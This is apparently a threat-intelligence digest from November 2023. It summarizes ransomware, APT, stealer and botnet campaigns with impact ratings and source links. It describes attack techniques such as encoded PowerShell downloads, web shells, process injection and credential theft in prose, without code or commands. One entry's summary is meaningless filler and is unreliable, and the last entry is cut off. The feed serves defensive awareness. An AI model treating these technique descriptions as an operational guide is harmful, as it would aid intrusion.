- The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known Rhysida ransomware IOCs and TTPs identified through investigations as recently as September 2023. Rhysida—an emerging ransomware variant—has predominately been deployed against the education, healthcare, manufacturing, information technology, and government sectors since May 2023. The information in this CSA is derived from related incident response investigations and malware analysis of samples discovered on victim networks.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-319a
—
- Intel Source:
- Cyber Geeks
- Intel Name:
- Dark_Pink_APT_Deployments
- Date of Scan:
- 2023-11-16
- Impact:
- MEDIUM
- Summary:
- The Asia-Pacific (APAC) area is currently experiencing a surge in advanced persistent threat (APT) attacks, which have been linked to a recently discovered group called Dark Pink (also known as the Saaiwc Group). Even though there is evidence that Dark Pink started operating as early as mid-2021, the group’s activity really picked up in the later half of 2022.
Source:
https://cyberint.com/blog/research/dark-pink-apt-attacks/
—
- Intel Source:
- Quointelligence
- Intel Name:
- The_Russian_speaking_voter_information_operation_in_Spain
- Date of Scan:
- 2023-11-16
- Impact:
- MEDIUM
- Summary:
- An account of a recent effort that targeted Spain’s Russian-speaking populace was given by Quointelligence researchers.
—
- Intel Source:
- Cyble
- Intel Name:
- Active_Vulnerability_Exploitation_for_Citrix_and_Big_IP
- Date of Scan:
- 2023-11-16
- Impact:
- LOW
- Summary:
- Researchers at Cyble have discovered that recently discovered vulnerabilities—which were first mentioned in the most recent Cybersecurity and Infrastructure Security Agency (CISA) advisory—are still being exploited. By releasing security alerts for the Big IP vulnerabilities (CVE-2023-46747, CVE-2023-46748) on October 31 and the actively exploited Citrix vulnerability (CVE-2023-4966) on October 10, CISA demonstrated proactive actions.
—
- Intel Source:
- Infoblox
- Intel Name:
- The_DGAs_New_Face
- Date of Scan:
- 2023-11-16
- Impact:
- LOW
- Summary:
- Infoblox has been offering DNS detection and response to domain generation algorithms (DGAs) since 2015. DGAs are a common tool used by DNS threat actors to disseminate illicit content, adware, malware, and phishing campaigns.
Source:
https://blogs.infoblox.com/cyber-threat-intelligence/rdgas-the-new-face-of-dgas/
—
- Intel Source:
- Cyber Geeks
- Intel Name:
- Personal_Attacks_on_Romanian_Gas_Companies
- Date of Scan:
- 2023-11-16
- Impact:
- LOW
- Summary:
- Researchers at Cyber Geeks have examined a scheme that exposes newly registered domains posing as well-known Romanian gas companies.
Source:
https://cybergeeks.tech/attackers-impersonate-romanian-gas-companies-osint-investigation/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- The_skimming_campaign_during_holidays
- Date of Scan:
- 2023-11-16
- Impact:
- MEDIUM
- Summary:
- The article discusses the rise of credit card skimming during the holiday shopping season. It explains malicious code is often embedded in merchant websites, making it difficult to detect when credit card information is stolen. It also mentions the Kritec skimming campaign, active since March 2023, and provides advice on how to shop safely online and a list of indicators of compromise associated with the Kritec campaign.
—
- Intel Source:
- Esentire
- Intel Name:
- Nitrogen_Campaign_2
- Date of Scan:
- 2023-11-15
- Impact:
- MEDIUM
- Summary:
- Researchers observed multiple incidents from a new Nitrogen campaign leading to ALPHV/BlackCat Ransomware infections. This campaign involved drive-by downloads where users inadvertently installed malicious software from compromised websites or through deceptive search advertisements. The initial infection was traced to an unmanaged device with access to the customer’s network, involving the download of Nitrogen payloads. The ISO file related to the infection contained several files, including executables and DLLs that decrypted additional ZIP archives containing malicious payloads. The campaign utilized encrypted commands in scheduled tasks and employed advanced techniques like transacted hollowing for process injection. Researchers noted enhanced capabilities in the malware, including AMSI bypass, ETW and WLDP patching, and antivirus evasion. The post-exploitation activities included lateral movement, data exfiltration, and the deployment of ALPHV ransomware, which encrypted files and exfiltrated data, significantly impacting the affected organizations.
—
- Intel Source:
- PaloAlto
- Intel Name:
- The_dangers_of_viewing_Clickbait_sites
- Date of Scan:
- 2023-11-15
- Impact:
- MEDIUM
- Summary:
- This article discusses the vulnerability CVE-2023-3169, which affects WordPress sites using the Newspaper and Newsmag themes with the Composer plugin. It reveals a massive campaign using the Balada Injector to exploit the vulnerability, and provides an example of the malicious script injected into webpages. It also outlines the trend of clickbait and ad sites being compromised at a nearly three to one ratio compared to other categories. Finally, it provides advice for readers to be aware of the risk and adjust their browsing habits accordingly.
Source:
https://unit42.paloaltonetworks.com/dangers-of-clickbait-sites/
—
- Intel Source:
- ASEC
- Intel Name:
- A_malware_strain_distribution_through_breached_legitimate_website
- Date of Scan:
- 2023-11-15
- Impact:
- LOW
- Summary:
- AhnLab EDR detected a malware strain distributed through breached legitimate websites using LNK files. It records files infiltration and exfiltration and allows users to view the infiltration path and file information. The malicious features of the script include executing another script, collecting system information, registering itself to the autorun registry, and sending data. AhnLab EDR protects the endpoint environment by providing behavioral detection, advanced analysis, holistic visibility, and proactive threat hunting.
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA402_with_IronWind_Infection_target_Middle_East_Based_Government
- Date of Scan:
- 2023-11-15
- Impact:
- HIGH
- Summary:
- From July to October 2023, researchers observed the TA402 group executing targeted phishing campaigns against Middle East and North Africa government entities using a complex infection chain called IronWind. The group varied its attack methods, shifting from Dropbox links to XLL and RAR file attachments to deliver the multifunctional malware. TA402’s campaigns involved phishing emails with lures related to economic themes or regional conflicts, utilizing compromised email accounts to deliver malware that communicated with a command-and-control domain. The IronWind downloader initiated a multi-stage infection process, involving a .NET executable and shellcode, aimed at espionage and intelligence collection. The group consistently employed geofencing techniques to hinder detection and maintained a focus on specific targets, despite ongoing regional conflicts. This activity demonstrates TA402’s persistent and evolving approach to cyber espionage.
—
- Intel Source:
- nccgroup
- Intel Name:
- Medusa_RaaS
- Date of Scan:
- 2023-11-15
- Impact:
- MEDIUM
- Summary:
- Researchers have analyzed the Medusa ransomware, a Ransomware-as-a-Service active since 2021, known for its double-extortion method. In a recent incident, initial access was gained through an exploited web server, leading to the deployment of webshells for continuous access. The attackers executed a range of activities, including using PowerShell to disable antivirus services, dumping password hashes, and exfiltrating data. The ransomware, which encrypts and threatens to release data unless a ransom is paid, was deployed over a 271-day period, utilizing various techniques for persistence and defense evasion. These included creating new user accounts, uploading web shells, and disabling Windows Defender. Lateral movement within the network was facilitated through Remote Desktop Protocol, and command-and-control was maintained via a reverse tunnel. The attack culminated in the deployment of the Medusa ransomware, resulting in encrypted files with the .MEDUSA extension and significant system recovery impediments due to the deletion of VMs and backups.
Source:
https://research.nccgroup.com/2023/11/13/dont-throw-a-hissy-fit-defend-against-medusa/
—
- Intel Source:
- Malware Analysis
- Intel Name:
- Ddostf_DDoS_Bot_Malware_Attacking_MySQL_Servers
- Date of Scan:
- 2023-11-15
- Impact:
- MEDIUM
- Summary:
- Ddostf DDoS bot is a malware targeting vulnerable MySQL servers. This bot, first identified in 2016 and known to operate in both Windows and Linux environments, conducts Distributed Denial of Service attacks. Attackers exploit MySQL servers using the 3306/TCP port, often through brute-force or dictionary attacks, and may also exploit system vulnerabilities. The Ddostf bot employs User-defined Function (UDF) DLLs to execute commands on the infected system, including downloading and executing additional malware. Ddostf copies itself under a random name in the system directory, registers as a service, and connects to a command-and-control server, from where it sends system information
Source:
https://malware.news/t/ddostf-ddos-bot-malware-attacking-mysql-servers/75611
—
- Intel Source:
- GBHackers
- Intel Name:
- APT_Infrastructure_in_China_Imitates_Cloud_Backup_Services
- Date of Scan:
- 2023-11-15
- Impact:
- MEDIUM
- Summary:
- GBHackers researchers have found that Chinese APT actors have targeted and penetrated government agencies in Cambodia. The infrastructure is being used by the threat actors to pose as a cloud backup service. The architecture also shows a number of persistent and malevolent connections.
Source:
https://gbhackers.com/chinese-apt-mimics-cloud-backup/
—
- Intel Source:
- Malware news
- Intel Name:
- The_exploitation_of_disguised_media_websites
- Date of Scan:
- 2023-11-15
- Impact:
- MEDIUM
- Summary:
- This article provides an overview of the lack of content in the section. It highlights the need for more content to be added in order to provide a comprehensive understanding of the topic.
—
- Intel Source:
- Resecurity
- Intel Name:
- The_increase_of_ransomware_attacks_on_the_energy_sector_and_on_nuclear_energy_firms
- Date of Scan:
- 2023-11-15
- Impact:
- HIGH
- Summary:
- Resecurity has identified a potential breach of Doosan’s Active Directory and other nuclear research organizations, as well as a BlackCat Ransomware attack on the European energy sector in February 2022. Additionally, threat actors have been targeting nuclear-energy firms and related entities, such as Brazil’s National Nuclear Energy Commission, Israel’s Neve Ne’eman nuclear reactor, and Indonesia’s National Nuclear Energy Agency (Batan). In April 2022, Oil India Limited (OIL) was hit by a ransomware attack, and in March 2022, State Electric Company Limited (STELCO) in Maldives experienced a ransomware attack by the Hive group.
—
- Intel Source:
- SentinelOne
- Intel Name:
- C3RB3R_Ransomware_Ongoing_Exploitation_of_CVE_2023_22518_Targets_Unpatched_Confluence_Servers
- Date of Scan:
- 2023-11-15
- Impact:
- MEDIUM
- Summary:
- Researchers have observed an increase in the exploitation of CVE-2023-22518, a vulnerability in Atlassian’s Confluence Data Center and Server, which allows unauthorized creation of backdoor administrator accounts. This vulnerability has been leveraged in multiple campaigns to deploy new Cerber ransomware variants, targeting both Windows and Linux hosts. The attack begins with a specially crafted HTTP-POST command to the exposed Confluence instance, leading to administrative control. Attackers then execute PowerShell scripts to download and execute the ransomware payloads. These payloads, observed on remote servers, include Linux and Windows versions of Cerber, which encrypt files and append a “.L0CK3D” extension, while also attempting to remove Volume Shadow Copies. The ransomware leaves a note with a unique TOR-based portal for victims to pay the ransom.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Ongoing_Exploitation_of_Critical_Atlassian_Authentication_Bypass_Vulnerability_CVE_2023_22518
- Date of Scan:
- 2023-11-14
- Impact:
- LOW
- Summary:
- This report outlines the active exploitation of a severe authentication bypass vulnerability (CVE-2023-22518) in Atlassian products. Despite initial reassurances from Atlassian, evidence reveals ongoing exploitation attempts, with attackers targeting specific URLs and utilizing a common header. The first incidents were detected on November 2nd, originating from diverse IP addresses, including Digital Ocean, Indian, and US-based sources. Notably, a parallel scan for the unrelated /rest/api/user URL suggests broader security concerns. Organizations are urged to take immediate action, applying patches and monitoring for suspicious activity to safeguard their Atlassian instances.
—
- Intel Source:
- Huntress
- Intel Name:
- Bitter_Pill_Third_Party_Pharmaceutical_Vendor_Linked_to_Pharmacy_and_Health_Clinic_Cyberattack
- Date of Scan:
- 2023-11-14
- Impact:
- LOW
- Summary:
- Attackers exploited a locally hosted instance of ScreenConnect, a remote access tool used by Outcomes. The attack involved four instances of ScreenConnect across two distinct endpoints, with one instance used on both endpoints. Tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) were similar across these endpoints. The attackers ensured persistent access by installing additional remote access tools like ScreenConnect or AnyDesk. One endpoint, a Windows Server 2019 Standard system in the pharmaceutical field, showed repeated access from August 9, 2023, using ScreenConnect, highlighting the sustained nature of the attack
—
- Intel Source:
- ASEC
- Intel Name:
- Phishing_PDF_Files_Downloading_Malicious_Packages
- Date of Scan:
- 2023-11-14
- Impact:
- LOW
- Summary:
- PDFs, disguised as game downloads or cracked software, lead users to a website where they download an encrypted file. Upon decryption and execution, this file, “File.exe,” modifies registry values to disable Windows Defender and steals IP and location information using browser login data. It then downloads various types of malware, including ransomware, PUPs, Infostealers, and droppers. The malware creates multiple subfiles and folders, significantly compromising the infected system. This campaign demonstrates the sophisticated methods used to distribute and execute multiple malware types, highlighting the need for caution when handling files from untrusted sources
—
- Intel Source:
- Kaspersky Content Hub
- Intel Name:
- Modern_Asian_APT_Groups
- Date of Scan:
- 2023-11-14
- Impact:
- MEDIUM
- Summary:
- This report provides comprehensive intelligence on Asian Advanced Persistent Threat (APT) groups, aiming to equip cybersecurity professionals with the knowledge to counteract these threats. It details incidents across the globe, the tactics, techniques, and procedures (TTPs) employed by these groups, and the pattern of attacks that span various countries and industries. The report is structured to aid a wide range of cybersecurity roles, including SOC analysts and C-Level executives, with technical details, mitigation strategies, and statistics on attack victims. It’s intended as a valuable resource for detecting and defending against the sophisticated tools and techniques of Asian APT actors.
—
- Intel Source:
- Blackberry
- Intel Name:
- BiBi_Wiper
- Date of Scan:
- 2023-11-14
- Impact:
- LOW
- Summary:
- BiBi Wiper is a malware originally targeting Linux systems and now adapted to run on Windows.This malware is designed to cause data destruction without leaving a ransom note or command-and-control servers. Its name, “BiBi,” references the nickname of Israeli Prime Minister Benjamin Netanyahu and is hardcoded into the malware. The Windows version of BiBi Wiper employs advanced techniques to maximize damage, including running multiple threads and targeting specific file types for destruction, while sparing essential system files. As the conflict continues, the use of such wipers in cyber warfare is expected to increase, highlighting the intertwining of physical and cyber conflicts
Source:
https://blogs.blackberry.com/en/2023/11/bibi-wiper-used-in-the-israel-hamas-war-now-runs-on-windows
—
- Intel Source:
- Palo Alto
- Intel Name:
- CVE_2023_36884_and_CVE_2023_36584
- Date of Scan:
- 2023-11-14
- Impact:
- MEDIUM
- Summary:
- CVE-2023-36584 has been used in a cyberattack campaign by a pro-Russian APT group, Storm-0978 (also known as the RomCom Group). This campaign, observed in July 2023, targeted groups supporting Ukraine’s admission into NATO. The attack utilized a sophisticated exploit chain involving a remote code execution vulnerability in Microsoft Office (CVE-2023-36884) to deliver malware. The lure was a weaponized Microsoft Word document, disguised as talking points for the NATO Summit on Ukraine. The vulnerability allowed bypassing of Microsoft’s Mark-of-the-Web security feature, a critical aspect in the attack’s success.
—
- Intel Source:
- Kaspersky
- Intel Name:
- Ducktail_malware_spreading_through_fake_clothing_job_ads
- Date of Scan:
- 2023-11-14
- Impact:
- LOW
- Summary:
- The Ducktail malware, active since 2021 and targeting Facebook business accounts, has been the focus of a recent campaign between March and October 2023, specifically targeting marketing professionals. This new version, written in Delphi, spreads via emails containing archives with images of new products and a malicious executable disguised as a PDF. The malware installs a browser extension that steals Facebook business and ad accounts. It manipulates browser shortcuts for Chromium-based browsers and uses AES encryption for some of its strings. The extension, disguised as Google Docs Offline, targets Facebook-related URLs to steal cookies and account details, potentially bypassing two-factor authentication using Facebook API requests and the 2fa.live service.
Source:
https://securelist.com/ducktail-fashion-week/111017/
—
- Intel Source:
- CISA
- Intel Name:
- Royal_Ransomware_November2023
- Date of Scan:
- 2023-11-14
- Impact:
- HIGH
- Summary:
- Since September 2022, Royal has targeted over 350 known victims worldwide and ransomware demands have exceeded 275 million USD. Royal conducts data exfiltration and extortion prior to encryption and then publishes victim data to a leak site if a ransom is not paid. Phishing emails are among the most successful vectors for initial access by Royal threat actors. There are indications that Royal may be preparing for a re-branding effort and/or a spinoff variant. Blacksuit ransomware shares a number of identified coding characteristics similar to Royal. A previous joint CSA for Royal ransomware was published on March 2, 2023. This joint CSA provides updated IOCs identified through FBI investigations.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a
—
- Intel Source:
- TrendMicro
- Intel Name:
- Cerber_Ransomware_Exploits_Atlassian_Confluence_Vulnerability_CVE_23_2251
- Date of Scan:
- 2023-11-14
- Impact:
- LOW
- Summary:
- On October 31, 2023, Atlassian announced CVE-2023-22518, an improper authorization vulnerability in Confluence Data Center and Server, allowing unauthorized creation of admin accounts. The vulnerability’s proof-of-concept was publicly leaked soon after. Researchers noted that Cerber ransomware is exploiting this vulnerability, reminiscent of Cerber’s 2021 attacks on Atlassian’s GitLab servers. The attack involves using a PowerShell command to download and execute a remote payload, connecting to a command-and-control server, and decrypting a text file to reveal the Cerber ransomware payload. This payload encrypts files and appends the “.L0CK3D” extension, also dropping a ransom note in all directories. The new Cerber variant has slight differences from older ones, indicating an evolution of the ransomware’s techniques.
Source:
https://www.trendmicro.com/en_us/research/23/k/cerber-ransomware-exploits-cve-2023-22518.html
—
- Intel Source:
- Cado Security
- Intel Name:
- OracleIV
- Date of Scan:
- 2023-11-14
- Impact:
- MEDIUM
- Summary:
- OracleIV is a Dockerized Distributed Denial of Service (DDoS) botnet. This malware targets publicly-exposed Docker Engine API instances, exploiting misconfigurations to deliver a malicious Docker container. The container, named “oracleiv_latest,” contains Python malware compiled as an ELF executable, capable of performing various DoS attacks. Attackers initiate access through a HTTP POST request to Docker’s API, pulling the malicious image from Dockerhub. The malware connects to a Command and Control server for instructions, using novel authentication methods
Source:
https://www.cadosecurity.com/oracleiv-a-dockerised-ddos-botnet/
—
- Intel Source:
- FarghlyMal
- Intel Name:
- Stealc_Stealer
- Date of Scan:
- 2023-11-14
- Impact:
- MEDIUM
- Summary:
- Stealc, a sophisticated information stealer, stands out for its non-resident nature and flexible data collection settings. Its development draws inspiration from other well-known stealers like Vidar, Raccoon, Mars, and Redline. Notably, Stealc can exfiltrate a vast array of data directly to a Command & Control server, bypassing traditional data storage methods. This capability includes stealing browser-based information like logins, credit card details, cookies, and history, along with wallet extensions, local crypto wallet files, various account tokens, and configuration files from applications like Discord, Telegram, Steam, qTox, and Pidgin. Stealc also can take screenshots of the victim’s machine. The malware employs techniques like opaque predicates for obfuscation and base64 encoding with RC4 decryption for its configuration, highlighting its complexity and evasive capabilities
Source:
https://farghlymal.github.io/Stealc-Stealer-Analysis/
—
- Intel Source:
- Security Boulevard
- Intel Name:
- Atom_Keylogger
- Date of Scan:
- 2023-11-14
- Impact:
- LOW
- Summary:
- Atom Keylogger is a budget-friendly and user-friendly malware aimed at aspiring cybercriminals. Sold on cybercrime forums for around $15 and payable through cryptocurrencies like Bitcoin, is designed to secretly record keystrokes and other user activities on infected computers. This functionality enables the theft of sensitive information such as passwords, credit card numbers, and personal data. Atom Keylogger’s low cost, ease of use, and stealthy capabilities make it a significant threat in the cybercrime landscape, allowing even unskilled individuals to engage in cybercrime and identity theft.
—
- Intel Source:
- NSFocus
- Intel Name:
- THE_NEW_APT_GROUP_DARKCASINO_AND_THE_GLOBAL_SURGE_IN_WINRAR_0_DAY_EXPLOITS
- Date of Scan:
- 2023-11-14
- Impact:
- MEDIUM
- Summary:
- DarkCasino is economically motivated and targets industries such as cryptocurrency trading, online casinos, and network banks. Their primary attack vectors include watering hole phishing and spear phishing. The CVE-2023-38831 vulnerability allows for arbitrary execution in WinRAR software, which DarkCasino exploited starting April 2023. This vulnerability became a significant tool for attackers, with widespread exploitation observed by various APT groups, including DarkPink in Southeast Asia and Konni in East Asia, targeting government agencies and improving attack processes and techniques
—
- Intel Source:
- Cado Security
- Intel Name:
- OracleIV_A_Dockerised_DDoS_Botnet
- Date of Scan:
- 2023-11-14
- Impact:
- MEDIUM
- Summary:
- OracleIV is a Dockerized Distributed Denial of Service (DDoS) botnet. This malware targets publicly-exposed Docker Engine API instances, exploiting misconfigurations to deliver a malicious Docker container. The container, named “oracleiv_latest,” contains Python malware compiled as an ELF executable, capable of performing various DoS attacks. Attackers initiate access through a HTTP POST request to Docker’s API, pulling the malicious image from Dockerhub. The malware connects to a Command and Control server for instructions, using novel authentication methods
Source:
https://www.cadosecurity.com/oracleiv-a-dockerised-ddos-botnet/
—
- Intel Source:
- Rexorvc0
- Intel Name:
- SystemBC_Coroxy_DroxiDat
- Date of Scan:
- 2023-11-13
- Impact:
- MEDIUM
- Summary:
- SystemBC is a versatile malware known as Coroxy or DroxiDat, which functions as proxy malware, a bot, a backdoor, and even a Remote Access Trojan (RAT). Active since 2018, it’s popular in underground markets and is used by various threat actors for different purposes, including reconnaissance, lateral movement, and deploying additional malware. SystemBC typically gathers system and user information, establishes persistence, and creates a Socks5 connection with a Command and Control server. Various groups have used SystemBC, many linked to ransomware activities.
Source:
https://rexorvc0.com/2023/11/12/Swiss-Knife-SystemBC-Coroxy/
—
- Intel Source:
- Bitdefender
- Intel Name:
- Hive_Ransomware_Offspring
- Date of Scan:
- 2023-11-13
- Impact:
- MEDIUM
- Summary:
- The recent emergence of Hunters International, a new ransomware group, follows the FBI-led dismantlement of Hive, a notorious ransomware collective. Despite Hive’s shutdown and the FBI’s efforts to mitigate damage by distributing decryption keys, this new group appears to have adopted Hive’s assets and technology. Hunters International distinguishes itself by focusing more on data exfiltration rather than encryption, and has simplified its ransomware code, now written in Rust, a language favored for its security features. Their approach reflects the evolving landscape of cyber threats, highlighting the persistence and adaptability of such groups in the face of law enforcement actions.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Spammers_abuse_Google_Forms_quiz_to_deliver_scams
- Date of Scan:
- 2023-11-10
- Impact:
- LOW
- Summary:
- Cisco Talos has recently observed an increase in spam messages abusing a feature of quizzes created within Google Forms. In particular, spammers have discovered that they can create a new quiz in Google Forms, use the victim’s email address to respond to the quiz, and then abuse the “Release Scores” feature of the Google Form to deliver their spam to the victim. Because the spam messages emanate from Google itself, the messages have a good chance of landing in the victim’s inbox.
Source:
https://blog.talosintelligence.com/google-forms-quiz-spam/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Code_Injection_Examples_in_Visual_Form
- Date of Scan:
- 2023-11-10
- Impact:
- LOW
- Summary:
- These days, code injection techniques (such as MITRE’s T1055) are frequently used. An attacker can conceal harmful code within a legitimate process in a pleasant fashion this way. A variation on this method is known as “Process Hollowing,” in which malicious code replaces the legitimately suspended process’s code. Calling Microsoft API functions such as VirtualAllocEx(), NtUnmapViewOfSecrio(), and WriteProcessMemory() allows for code injection.
Source:
https://isc.sans.edu/diary/Visual+Examples+of+Code+Injection/30388/
—
- Intel Source:
- Red Canary
- Intel Name:
- Adversaries_exploit_Confluence_vulnerability_to_deploy_ransomware
- Date of Scan:
- 2023-11-10
- Impact:
- MEDIUM
- Summary:
- Red Canary reported the exploitation of Atlassian Confluence CVE-2023-22518, leading to attempts to deploy Cerber ransomware. The vulnerability allows unauthenticated users to upload a .zip file to Confluence instances, enabling data destruction or remote code execution. Red Canary suggests updating Confluence to the versions specified by Atlassian to mitigate the risk. The observed attack involved uploading a web shell, running reconnaissance commands, and executing encoded PowerShell to download ransomware.
Source:
https://redcanary.com/blog/confluence-exploit-ransomware/
—
- Intel Source:
- TrendMicro
- Intel Name:
- How_Kopeechka_an_Automated_Social_Media_Accounts_Creation_Service_Can_Facilitate_Cybercrime
- Date of Scan:
- 2023-11-10
- Impact:
- LOW
- Summary:
- Kopeechka is a service active since 2019, facilitating automated registration of social media accounts by bypassing email verification and CAPTCHAs. It offers temporary access to emails for account confirmation without providing actual mailbox access, enabling the creation of accounts on various platforms. Kopeechka also provides integration with online SMS services for phone verification. This service, while not illegal, supports large-scale cybercrime activities such as spamming and misinformation by allowing the creation of numerous accounts quickly and inexpensively. The emergence of such services underscores the professionalization of cybercrime and the need for stronger security measures by social media platforms.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Hackers_Harvesting_Credentials_Using_File_Sharing_Services_and_Reverse_Proxies
- Date of Scan:
- 2023-11-10
- Impact:
- LOW
- Summary:
- Researchers at Trend Micro have examined a phishing effort that involves malicious emails that link to a file-sharing program. The second link in the email takes users to a PDF document that contains a secondary link that is intended to capture session cookies and login credentials.
—
- Intel Source:
- Crowdstrike
- Intel Name:
- IMPERIAL_KITTEN_Deploys_Novel_Malware_Families_in_Middle_East_Focused_Operations
- Date of Scan:
- 2023-11-10
- Impact:
- MEDIUM
- Summary:
- The CrowdStrike blog describes IMPERIAL KITTEN, an Iran-nexus adversary with ties to the Islamic Revolutionary Guard Corps, deploying novel malware families in cyberattacks targeting the Middle East, specifically transportation, logistics, and technology sectors in October 2023. The group uses tactics like public scanning tools, exploits, and stolen VPN credentials for access; employs PAExec and credential theft for lateral movement; and utilizes custom malware for data exfiltration. Malware like IMAPLoader, StandardKeyboard, and a Python reverse shell delivered via Excel documents are highlighted. IMPERIAL KITTEN’s activity is characterized by social engineering with a focus on Israeli organizations, and the blog provides a detailed analysis of the group’s tooling and methods.
Source:
https://www.crowdstrike.com/blog/imperial-kitten-deploys-novel-malware-families/
—
- Intel Source:
- Unit 42
- Intel Name:
- EleKtra_Leak_Tracking_Malicious_Operations_of_Exposed_IAM_Keys
- Date of Scan:
- 2023-11-10
- Impact:
- LOW
- Summary:
- Unit 42 researchers have uncovered an active campaign named EleKtra-Leak which targets exposed IAM credentials within public GitHub repositories. The campaign, believed to be ongoing for at least two years, involves creating AWS EC2 instances for cryptojacking operations. The threat actors can exploit exposed credentials within five minutes of their appearance on GitHub.
Source:
https://unit42.paloaltonetworks.com/malicious-operations-of-exposed-iam-keys-cryptojacking/
—
- Intel Source:
- Deep Instinct
- Intel Name:
- MuddyC2Go_Latest_C2_Framework_Used_by_Iranian_APT_MuddyWater_Spotted_in_Israel
- Date of Scan:
- 2023-11-10
- Impact:
- MEDIUM
- Summary:
- The Deep Instinct Threat Research team has discovered a new Command and Control (C2) framework named MuddyC2Go, believed to be used by the Iranian APT group MuddyWater since at least 2020. This framework, written in Go, is a shift from their previous tool, PhonyC2. MuddyWater’s typical tactics involve spear-phishing to deliver malware. Recent changes include password-protected archives to evade detection and executables that connect directly to the C2, bypassing the need for manual script execution. Instances of MuddyC2Go usage were observed in various Middle Eastern countries with specific targeting of Israeli entities. Attribution to MuddyWater is based on past activities, IP address analysis, and unique URL patterns, with known servers hosted by a VPS provider associated with malicious activities. Deep Instinct recommends disabling PowerShell if not needed or monitoring its activity closely due to MuddyWater’s reliance on PowerShell payloads.
—
- Intel Source:
- SysAid
- Intel Name:
- SysAid_On_Prem_Software_CVE_2023_47246_Vulnerability
- Date of Scan:
- 2023-11-10
- Impact:
- LOW
- Summary:
- A vulnerability was identified in SysAid’s on-premises software, leading to an immediate response and communication with customers to implement a mitigation solution. The zero-day vulnerability allowed the Lace Tempest group to execute code and deploy the GraceWire trojan via a WebShell. Users are urged to update SysAid systems to version 23.3.36 and perform a network compromise assessment. The attack involved path traversal, PowerShell scripts to launch malware and erase evidence, and the use of a CobaltStrike agent.
Source:
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
—
- Intel Source:
- ASEC
- Intel Name:
- Distribution_of_LockBit_Ransomware_and_Vidar_Infostealer
- Date of Scan:
- 2023-11-09
- Impact:
- MEDIUM
- Summary:
- One of the primary ways the LockBit ransomware spreads is through the use of resume impersonation. In February of this year, information on this was posted on the ASEC Blog. It has been verified that the most recent deployments also contain an Infostealer, as opposed to earlier ones that simply contained the LockBit ransomware.
—
- Intel Source:
- Twitter, GitHub, Abuse.ch, Palo Alto
- Intel Name:
- The_Pikabot_malware_activity
- Date of Scan:
- 2023-11-09
- Impact:
- MEDIUM
- Summary:
- Unit 42, Palo Alto researchers saw Pikabot malware is being spread by TA577 like many others throughout this week. They and others collected indicators of compromise (IOCs) from last couple days of the infection. TA577 – a threat actor acting as initial access broker (IAB) for ransomware, targeting western organisation, URLs leading to a password-protected zip (pass H17) containing a JavaScript file which uses cURL to run PikaBot.
Source:
https://twitter.com/threatinsight/status/1721983400611864640
https://bazaar.abuse.ch/browse/signature/pikabot/
https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2023-11-02-IOCs-for-TA577-Pikabot-activity.txt
https://github.com/threatlabz/iocs/blob/main/pikabot/c2s_20231102.txt
https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_02.11.2023.txt
https://www.agid.gov.it/it/agenzia/stampa-e-comunicazione/notizie/2023/10/31/attenzione-al-malware-pikabot-false-mail-comunicano-enti-lavvenuta-federazione-spid
—
- Intel Source:
- Sentilone
- Intel Name:
- An_Infostealer_Powered_by_ChatGPT_Aims_at_Cloud_Platforms
- Date of Scan:
- 2023-11-09
- Impact:
- LOW
- Summary:
- Researchers at SentinelLabs have discovered a brand-new infostealer and hacking tool named “Predator AI” that targets cloud services and is based on Python. To improve the tool’s usability and provide a unified text-driven interface for various functions, the Predator AI developer incorporated a ChatGPT-driven class into the Python script.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Adversary_Using_Fake_PC_News_Website_to_Spread_Information_Stealers
- Date of Scan:
- 2023-11-09
- Impact:
- LOW
- Summary:
- Researchers at Malwarebytes have discovered that a threat actor is replicating WindowsReport.com, a reputable Windows news page, in order to propagate a malicious installer for CPU-Z, a well-known processor tool.
—
- Intel Source:
- ASEC
- Intel Name:
- Notification_Regarding_Phobos_Ransomware
- Date of Scan:
- 2023-11-09
- Impact:
- LOW
- Summary:
- Researchers from ASEC have found that the Phobos ransomware is still operational. One variation called Phobos is well-known for having operational and technological parallels to both the Dharma and CrySis malware. These ransomware strains usually use insecure security features on Remote Desktop Protocol (RDP) services that are open to the outside world as attack vectors. Administrators are recommended to exercise caution, since ransomware dissemination frequently uses these susceptible RDPs as initial ports of entry.
—
- Intel Source:
- Seqrite
- Intel Name:
- A_Look_at_Its_Function_in_Distribution_of_Malware
- Date of Scan:
- 2023-11-09
- Impact:
- LOW
- Summary:
- Researchers from Seqrite have seen the use of a batloader to administer Agent Tesla. It’s not exclusive to this particular virus strain, though. It has also been regularly noted that this batloader aids in the injection of other malware families. Even if the coding could differ slightly, the fundamental process is very constant.
—
- Intel Source:
- Mandiant
- Intel Name:
- Ukraine_Power_Grid_Downed_by_Sandworms
- Date of Scan:
- 2023-11-09
- Impact:
- MEDIUM
- Summary:
- The notorious Sandworm advanced persistent threat (APT) organization from Russia employed live-off-the-land (LotL) tactics to cause a power outage in a Ukrainian city in October 2022, which was followed by a flurry of missile strikes.
Source:
https://www.mandiant.com/resources/blog/sandworm-disrupts-power-ukraine-operational-technology
—
- Intel Source:
- Checkmarx
- Intel Name:
- BlazeStealer_Malware_Found_in_Python_Packages_on_PyPI
- Date of Scan:
- 2023-11-09
- Impact:
- LOW
- Summary:
- The ultimate goal of a fresh batch of malicious Python packages that have made their way into the Python Package Index (PyPI) repository is to steal private data from developer systems that have been breached. The packages contain malware known as BlazeStealer, while appearing to be harmless obfuscation tools.
Source:
https://checkmarx.com/blog/python-obfuscation-traps/?
—
- Intel Source:
- Palo Alto
- Intel Name:
- Chinese_APT_Attacks_Government_of_Cambodia
- Date of Scan:
- 2023-11-09
- Impact:
- MEDIUM
- Summary:
